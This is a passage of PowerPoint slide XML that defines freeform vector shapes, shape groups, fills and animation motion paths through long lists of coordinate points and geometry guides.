                  <a:close/>
                  <a:moveTo>
                    <a:pt x="5355" y="4452"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5355" y="4452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5350" y="4510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5334" y="4563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5308" y="4610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5271" y="4652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5271" y="4652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5224" y="4689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5177" y="4715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5124" y="4730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5066" y="4736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3927" y="4736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3927" y="4736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3869" y="4730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3817" y="4715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3770" y="4689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3722" y="4652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3722" y="4652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3685" y="4610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3659" y="4563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3644" y="4510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3638" y="4452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3638" y="2163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3638" y="2163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3644" y="2111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3659" y="2058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3685" y="2011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3722" y="1964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3722" y="1964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3770" y="1927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3817" y="1901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3869" y="1885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3927" y="1880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5066" y="1880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5066" y="1880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5124" y="1885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5177" y="1901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5224" y="1927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5271" y="1964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5271" y="1964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5308" y="2011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5334" y="2058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5350" y="2111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5355" y="2163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5355" y="445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2324100" y="58801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510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15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4.44444E-6 -3.33333E-6 L -4.44444E-6 0.10926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9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"/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"/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"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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400"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="2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45243 0.26852 " pathEditMode="relative" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="50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45243 0.26852 " pathEditMode="relative" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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45243 0.26852 " pathEditMode="relative" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="500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45243 0.26852 " pathEditMode="relative" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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45243 0.26852 " pathEditMode="relative" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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4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5" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36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3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300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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300"/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300"/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10"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="6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1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190" name="Group 189"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6546612" y="3524861"/>
            <a:ext cx="5334223" cy="2629523"/>
            <a:chOff x="6546612" y="3524861"/>
            <a:chExt cx="5334223" cy="2629523"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="98" name="Group 97"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6696959" y="3582807"/>
              <a:ext cx="2176915" cy="1819836"/>
              <a:chOff x="2455863" y="1114425"/>
              <a:chExt cx="2206625" cy="1844675"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="595959"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="172" name="Freeform 18"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2455863" y="2816225"/>
                <a:ext cx="263525" cy="142875"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 189 w 731"/>
                  <a:gd name="T1" fmla="*/ 215 h 395"/>
                  <a:gd name="T2" fmla="*/ 142 w 731"/>
                  <a:gd name="T3" fmla="*/ 357 h 395"/>
                  <a:gd name="T4" fmla="*/ 47 w 731"/>
                  <a:gd name="T5" fmla="*/ 320 h 395"/>
                  <a:gd name="T6" fmla="*/ 53 w 731"/>
                  <a:gd name="T7" fmla="*/ 310 h 395"/>
                  <a:gd name="T8" fmla="*/ 53 w 731"/>
                  <a:gd name="T9" fmla="*/ 310 h 395"/>
                  <a:gd name="T10" fmla="*/ 63 w 731"/>
                  <a:gd name="T11" fmla="*/ 273 h 395"/>
                  <a:gd name="T12" fmla="*/ 68 w 731"/>
                  <a:gd name="T13" fmla="*/ 241 h 395"/>
                  <a:gd name="T14" fmla="*/ 74 w 731"/>
                  <a:gd name="T15" fmla="*/ 215 h 395"/>
                  <a:gd name="T16" fmla="*/ 68 w 731"/>
                  <a:gd name="T17" fmla="*/ 189 h 395"/>
                  <a:gd name="T18" fmla="*/ 68 w 731"/>
                  <a:gd name="T19" fmla="*/ 189 h 395"/>
                  <a:gd name="T20" fmla="*/ 58 w 731"/>
                  <a:gd name="T21" fmla="*/ 163 h 395"/>
                  <a:gd name="T22" fmla="*/ 47 w 731"/>
                  <a:gd name="T23" fmla="*/ 142 h 395"/>
                  <a:gd name="T24" fmla="*/ 26 w 731"/>
                  <a:gd name="T25" fmla="*/ 121 h 395"/>
                  <a:gd name="T26" fmla="*/ 0 w 731"/>
                  <a:gd name="T27" fmla="*/ 105 h 395"/>
                  <a:gd name="T28" fmla="*/ 42 w 731"/>
                  <a:gd name="T29" fmla="*/ 0 h 395"/>
                  <a:gd name="T30" fmla="*/ 730 w 731"/>
                  <a:gd name="T31" fmla="*/ 252 h 395"/>
                  <a:gd name="T32" fmla="*/ 682 w 731"/>
                  <a:gd name="T33" fmla="*/ 394 h 395"/>
                  <a:gd name="T34" fmla="*/ 189 w 731"/>
                  <a:gd name="T35" fmla="*/ 215 h 3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31" h="395">
                    <a:moveTo>
                      <a:pt x="189" y="215"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="142" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="730" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="682" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="215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3" name="Freeform 19"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2693988" y="2770188"/>
                <a:ext cx="71437" cy="68262"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 199 w 200"/>
                  <a:gd name="T1" fmla="*/ 63 h 190"/>
                  <a:gd name="T2" fmla="*/ 147 w 200"/>
                  <a:gd name="T3" fmla="*/ 189 h 190"/>
                  <a:gd name="T4" fmla="*/ 0 w 200"/>
                  <a:gd name="T5" fmla="*/ 126 h 190"/>
                  <a:gd name="T6" fmla="*/ 52 w 200"/>
                  <a:gd name="T7" fmla="*/ 0 h 190"/>
                  <a:gd name="T8" fmla="*/ 199 w 200"/>
                  <a:gd name="T9" fmla="*/ 63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" h="190">
                    <a:moveTo>
                      <a:pt x="199" y="63"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="147" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="63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4" name="Freeform 20"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2540000" y="2514600"/>
                <a:ext cx="263525" cy="244475"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 116 w 731"/>
                  <a:gd name="T1" fmla="*/ 115 h 678"/>
                  <a:gd name="T2" fmla="*/ 116 w 731"/>
                  <a:gd name="T3" fmla="*/ 115 h 678"/>
                  <a:gd name="T4" fmla="*/ 142 w 731"/>
                  <a:gd name="T5" fmla="*/ 68 h 678"/>
                  <a:gd name="T6" fmla="*/ 179 w 731"/>
                  <a:gd name="T7" fmla="*/ 37 h 678"/>
                  <a:gd name="T8" fmla="*/ 179 w 731"/>
                  <a:gd name="T9" fmla="*/ 37 h 678"/>
                  <a:gd name="T10" fmla="*/ 210 w 731"/>
                  <a:gd name="T11" fmla="*/ 15 h 678"/>
                  <a:gd name="T12" fmla="*/ 252 w 731"/>
                  <a:gd name="T13" fmla="*/ 0 h 678"/>
                  <a:gd name="T14" fmla="*/ 252 w 731"/>
                  <a:gd name="T15" fmla="*/ 0 h 678"/>
                  <a:gd name="T16" fmla="*/ 289 w 731"/>
                  <a:gd name="T17" fmla="*/ 0 h 678"/>
                  <a:gd name="T18" fmla="*/ 331 w 731"/>
                  <a:gd name="T19" fmla="*/ 5 h 678"/>
                  <a:gd name="T20" fmla="*/ 331 w 731"/>
                  <a:gd name="T21" fmla="*/ 5 h 678"/>
                  <a:gd name="T22" fmla="*/ 368 w 731"/>
                  <a:gd name="T23" fmla="*/ 15 h 678"/>
                  <a:gd name="T24" fmla="*/ 405 w 731"/>
                  <a:gd name="T25" fmla="*/ 32 h 678"/>
                  <a:gd name="T26" fmla="*/ 405 w 731"/>
                  <a:gd name="T27" fmla="*/ 32 h 678"/>
                  <a:gd name="T28" fmla="*/ 452 w 731"/>
                  <a:gd name="T29" fmla="*/ 58 h 678"/>
                  <a:gd name="T30" fmla="*/ 489 w 731"/>
                  <a:gd name="T31" fmla="*/ 89 h 678"/>
                  <a:gd name="T32" fmla="*/ 489 w 731"/>
                  <a:gd name="T33" fmla="*/ 89 h 678"/>
                  <a:gd name="T34" fmla="*/ 515 w 731"/>
                  <a:gd name="T35" fmla="*/ 126 h 678"/>
                  <a:gd name="T36" fmla="*/ 530 w 731"/>
                  <a:gd name="T37" fmla="*/ 162 h 678"/>
                  <a:gd name="T38" fmla="*/ 530 w 731"/>
                  <a:gd name="T39" fmla="*/ 162 h 678"/>
                  <a:gd name="T40" fmla="*/ 536 w 731"/>
                  <a:gd name="T41" fmla="*/ 205 h 678"/>
                  <a:gd name="T42" fmla="*/ 530 w 731"/>
                  <a:gd name="T43" fmla="*/ 247 h 678"/>
                  <a:gd name="T44" fmla="*/ 530 w 731"/>
                  <a:gd name="T45" fmla="*/ 247 h 678"/>
                  <a:gd name="T46" fmla="*/ 520 w 731"/>
                  <a:gd name="T47" fmla="*/ 294 h 678"/>
                  <a:gd name="T48" fmla="*/ 504 w 731"/>
                  <a:gd name="T49" fmla="*/ 341 h 678"/>
                  <a:gd name="T50" fmla="*/ 467 w 731"/>
                  <a:gd name="T51" fmla="*/ 415 h 678"/>
                  <a:gd name="T52" fmla="*/ 730 w 731"/>
                  <a:gd name="T53" fmla="*/ 546 h 678"/>
                  <a:gd name="T54" fmla="*/ 667 w 731"/>
                  <a:gd name="T55" fmla="*/ 677 h 678"/>
                  <a:gd name="T56" fmla="*/ 0 w 731"/>
                  <a:gd name="T57" fmla="*/ 346 h 678"/>
                  <a:gd name="T58" fmla="*/ 116 w 731"/>
                  <a:gd name="T59" fmla="*/ 115 h 678"/>
                  <a:gd name="T60" fmla="*/ 399 w 731"/>
                  <a:gd name="T61" fmla="*/ 305 h 678"/>
                  <a:gd name="T62" fmla="*/ 399 w 731"/>
                  <a:gd name="T63" fmla="*/ 305 h 678"/>
                  <a:gd name="T64" fmla="*/ 405 w 731"/>
                  <a:gd name="T65" fmla="*/ 283 h 678"/>
                  <a:gd name="T66" fmla="*/ 409 w 731"/>
                  <a:gd name="T67" fmla="*/ 262 h 678"/>
                  <a:gd name="T68" fmla="*/ 409 w 731"/>
                  <a:gd name="T69" fmla="*/ 247 h 678"/>
                  <a:gd name="T70" fmla="*/ 405 w 731"/>
                  <a:gd name="T71" fmla="*/ 226 h 678"/>
                  <a:gd name="T72" fmla="*/ 405 w 731"/>
                  <a:gd name="T73" fmla="*/ 226 h 678"/>
                  <a:gd name="T74" fmla="*/ 399 w 731"/>
                  <a:gd name="T75" fmla="*/ 210 h 678"/>
                  <a:gd name="T76" fmla="*/ 383 w 731"/>
                  <a:gd name="T77" fmla="*/ 194 h 678"/>
                  <a:gd name="T78" fmla="*/ 368 w 731"/>
                  <a:gd name="T79" fmla="*/ 179 h 678"/>
                  <a:gd name="T80" fmla="*/ 342 w 731"/>
                  <a:gd name="T81" fmla="*/ 162 h 678"/>
                  <a:gd name="T82" fmla="*/ 342 w 731"/>
                  <a:gd name="T83" fmla="*/ 162 h 678"/>
                  <a:gd name="T84" fmla="*/ 315 w 731"/>
                  <a:gd name="T85" fmla="*/ 152 h 678"/>
                  <a:gd name="T86" fmla="*/ 294 w 731"/>
                  <a:gd name="T87" fmla="*/ 147 h 678"/>
                  <a:gd name="T88" fmla="*/ 273 w 731"/>
                  <a:gd name="T89" fmla="*/ 147 h 678"/>
                  <a:gd name="T90" fmla="*/ 258 w 731"/>
                  <a:gd name="T91" fmla="*/ 147 h 678"/>
                  <a:gd name="T92" fmla="*/ 258 w 731"/>
                  <a:gd name="T93" fmla="*/ 147 h 678"/>
                  <a:gd name="T94" fmla="*/ 236 w 731"/>
                  <a:gd name="T95" fmla="*/ 158 h 678"/>
                  <a:gd name="T96" fmla="*/ 221 w 731"/>
                  <a:gd name="T97" fmla="*/ 168 h 678"/>
                  <a:gd name="T98" fmla="*/ 205 w 731"/>
                  <a:gd name="T99" fmla="*/ 184 h 678"/>
                  <a:gd name="T100" fmla="*/ 195 w 731"/>
                  <a:gd name="T101" fmla="*/ 210 h 678"/>
                  <a:gd name="T102" fmla="*/ 168 w 731"/>
                  <a:gd name="T103" fmla="*/ 262 h 678"/>
                  <a:gd name="T104" fmla="*/ 368 w 731"/>
                  <a:gd name="T105" fmla="*/ 362 h 678"/>
                  <a:gd name="T106" fmla="*/ 399 w 731"/>
                  <a:gd name="T107" fmla="*/ 305 h 6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31" h="678">
                    <a:moveTo>
                      <a:pt x="116" y="115"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="116" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="730" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="667" y="677"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="346"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="115"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="399" y="305"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="399" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="305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5" name="Freeform 21"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2635250" y="2368550"/>
                <a:ext cx="307975" cy="219075"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 73 w 856"/>
                  <a:gd name="T1" fmla="*/ 110 h 610"/>
                  <a:gd name="T2" fmla="*/ 283 w 856"/>
                  <a:gd name="T3" fmla="*/ 231 h 610"/>
                  <a:gd name="T4" fmla="*/ 283 w 856"/>
                  <a:gd name="T5" fmla="*/ 231 h 610"/>
                  <a:gd name="T6" fmla="*/ 283 w 856"/>
                  <a:gd name="T7" fmla="*/ 231 h 610"/>
                  <a:gd name="T8" fmla="*/ 267 w 856"/>
                  <a:gd name="T9" fmla="*/ 194 h 610"/>
                  <a:gd name="T10" fmla="*/ 267 w 856"/>
                  <a:gd name="T11" fmla="*/ 152 h 610"/>
                  <a:gd name="T12" fmla="*/ 273 w 856"/>
                  <a:gd name="T13" fmla="*/ 115 h 610"/>
                  <a:gd name="T14" fmla="*/ 289 w 856"/>
                  <a:gd name="T15" fmla="*/ 73 h 610"/>
                  <a:gd name="T16" fmla="*/ 289 w 856"/>
                  <a:gd name="T17" fmla="*/ 73 h 610"/>
                  <a:gd name="T18" fmla="*/ 310 w 856"/>
                  <a:gd name="T19" fmla="*/ 47 h 610"/>
                  <a:gd name="T20" fmla="*/ 330 w 856"/>
                  <a:gd name="T21" fmla="*/ 26 h 610"/>
                  <a:gd name="T22" fmla="*/ 351 w 856"/>
                  <a:gd name="T23" fmla="*/ 10 h 610"/>
                  <a:gd name="T24" fmla="*/ 378 w 856"/>
                  <a:gd name="T25" fmla="*/ 5 h 610"/>
                  <a:gd name="T26" fmla="*/ 378 w 856"/>
                  <a:gd name="T27" fmla="*/ 5 h 610"/>
                  <a:gd name="T28" fmla="*/ 404 w 856"/>
                  <a:gd name="T29" fmla="*/ 0 h 610"/>
                  <a:gd name="T30" fmla="*/ 436 w 856"/>
                  <a:gd name="T31" fmla="*/ 5 h 610"/>
                  <a:gd name="T32" fmla="*/ 467 w 856"/>
                  <a:gd name="T33" fmla="*/ 15 h 610"/>
                  <a:gd name="T34" fmla="*/ 498 w 856"/>
                  <a:gd name="T35" fmla="*/ 31 h 610"/>
                  <a:gd name="T36" fmla="*/ 855 w 856"/>
                  <a:gd name="T37" fmla="*/ 246 h 610"/>
                  <a:gd name="T38" fmla="*/ 782 w 856"/>
                  <a:gd name="T39" fmla="*/ 367 h 610"/>
                  <a:gd name="T40" fmla="*/ 451 w 856"/>
                  <a:gd name="T41" fmla="*/ 173 h 610"/>
                  <a:gd name="T42" fmla="*/ 451 w 856"/>
                  <a:gd name="T43" fmla="*/ 173 h 610"/>
                  <a:gd name="T44" fmla="*/ 420 w 856"/>
                  <a:gd name="T45" fmla="*/ 157 h 610"/>
                  <a:gd name="T46" fmla="*/ 393 w 856"/>
                  <a:gd name="T47" fmla="*/ 152 h 610"/>
                  <a:gd name="T48" fmla="*/ 393 w 856"/>
                  <a:gd name="T49" fmla="*/ 152 h 610"/>
                  <a:gd name="T50" fmla="*/ 373 w 856"/>
                  <a:gd name="T51" fmla="*/ 162 h 610"/>
                  <a:gd name="T52" fmla="*/ 351 w 856"/>
                  <a:gd name="T53" fmla="*/ 183 h 610"/>
                  <a:gd name="T54" fmla="*/ 351 w 856"/>
                  <a:gd name="T55" fmla="*/ 183 h 610"/>
                  <a:gd name="T56" fmla="*/ 346 w 856"/>
                  <a:gd name="T57" fmla="*/ 199 h 610"/>
                  <a:gd name="T58" fmla="*/ 341 w 856"/>
                  <a:gd name="T59" fmla="*/ 215 h 610"/>
                  <a:gd name="T60" fmla="*/ 341 w 856"/>
                  <a:gd name="T61" fmla="*/ 231 h 610"/>
                  <a:gd name="T62" fmla="*/ 346 w 856"/>
                  <a:gd name="T63" fmla="*/ 246 h 610"/>
                  <a:gd name="T64" fmla="*/ 351 w 856"/>
                  <a:gd name="T65" fmla="*/ 257 h 610"/>
                  <a:gd name="T66" fmla="*/ 362 w 856"/>
                  <a:gd name="T67" fmla="*/ 272 h 610"/>
                  <a:gd name="T68" fmla="*/ 393 w 856"/>
                  <a:gd name="T69" fmla="*/ 299 h 610"/>
                  <a:gd name="T70" fmla="*/ 714 w 856"/>
                  <a:gd name="T71" fmla="*/ 488 h 610"/>
                  <a:gd name="T72" fmla="*/ 640 w 856"/>
                  <a:gd name="T73" fmla="*/ 609 h 610"/>
                  <a:gd name="T74" fmla="*/ 0 w 856"/>
                  <a:gd name="T75" fmla="*/ 231 h 610"/>
                  <a:gd name="T76" fmla="*/ 73 w 856"/>
                  <a:gd name="T77" fmla="*/ 110 h 6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856" h="610">
                    <a:moveTo>
                      <a:pt x="73" y="110"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="283" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="330" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="498" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="855" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="782" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="299"/>
